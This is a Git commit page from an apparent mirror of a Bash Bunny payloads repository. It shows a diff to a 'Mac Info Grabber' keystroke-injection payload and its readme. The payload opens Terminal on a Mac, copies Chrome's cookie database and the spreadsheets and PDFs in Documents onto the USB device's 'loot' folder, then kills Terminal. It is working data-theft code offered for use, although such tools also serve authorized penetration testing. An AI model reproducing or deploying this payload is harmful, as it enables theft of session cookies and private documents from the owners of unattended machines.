weyne/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5darren/bashbunny-payloads.git synced 2025-10-29 16:58:12 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #51 from audibleblink/fix/macinfograbber

Browse Source 
Fixes macinfograbber payload
This commit is contained in:
Sebastian Kinne 2017-03-14 11:18:47 +11:00 committed by GitHub
commit 00927dc04c
2 changed files with 26 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
payloads/library/macinfograbber/payload.txt
View File

@ -2,48 +2,51 @@
# #
# Title: Mac Info Grabber # Title: Mac Info Grabber
# Author: kmakblob # Author: kmakblob
# Version: 1.1 # Version: 1.2
# #
# Steaks cookies from chrome and documents from the documents folder (spreadsheets) # Steaks cookies from chrome and documents from the documents folder (spreadsheets)
# then stashes them in /root/udisk/loot/MacLoot # then stashes them in /root/udisk/loot/MacLoot
# #
# Amber..............Executing payload
# Red................Failed to get spreadsheets # Red................Failed to get spreadsheets
# Purple.............Got some spreadsheets # Purple.............Got some spreadsheets
# Green..............Finished # Green..............Finished
# #
LED R LED G R
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
LOOTDIR=/root/udisk/loot/MacLoot
mkdir -p $LOOTDIR lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir
QUACK GUI SPACE QUACK GUI SPACE
QUACK DELAY 1000 QUACK DELAY 1000
QUACK STRING terminal QUACK STRING terminal
QUACK ENTER QUACK ENTER
QUACK DELAY 8000 QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/xlsx QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
QUACK ENTER QUACK ENTER
QUACK DELAY 500 QUACK DELAY 500
QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \>
/Volumes/BashBunny/$lootdir/chromecookies.db
QUACK ENTER QUACK ENTER
QUACK DELAY 1000 QUACK DELAY 1000
QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/$LOOTDIR/xlsx/ QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
QUACK ENTER
QUACK DELAY 1000
QUACK GUI q
QUACK DELAY 500
QUACK ENTER QUACK ENTER
# Sync filesystem
sync
# Green LED for finished # Green LED for finished
LED G LED G
files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l) files=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xls 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l) files2=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xlsx 2> /dev/null | wc -l)
if [ "$files" != "0" -o "$files2" != "0"]
then if [ "$files" != "0" -o "$files2" != "0"]; then
# Got spreadsheet files # Got spreadsheet files
LED R B LED R B
else else
LED R LED R
# No spread sheets # No spread sheets
fi fi

5
payloads/library/macinfograbber/readme.md
View File

@ -1,7 +1,7 @@
# Mac Info Grabber for the BashBunny # Mac Info Grabber for the BashBunny
* Author: kmakblob * Author: kmakblob
* Version: Version 1.0 * Version: Version 1.2
* Target: OSX * Target: OSX
## Description ## Description
@ -15,6 +15,7 @@ This payload can be easily modified to grab other files like word docs or csv fi
| LED | Status | | LED | Status |
| ------------------ | -------------------------------------------- | | ------------------ | -------------------------------------------- |
| Amber | Executin Payload |
| Green | Attack Finished | | Green | Attack Finished |
| Purple | Successfully grabbed xls or xlsx files | | Purple | Successfully grabbed xls or xlsx files |
| RED | Did not get any xls or xlsx files | | Red | Did not get any xls or xlsx files |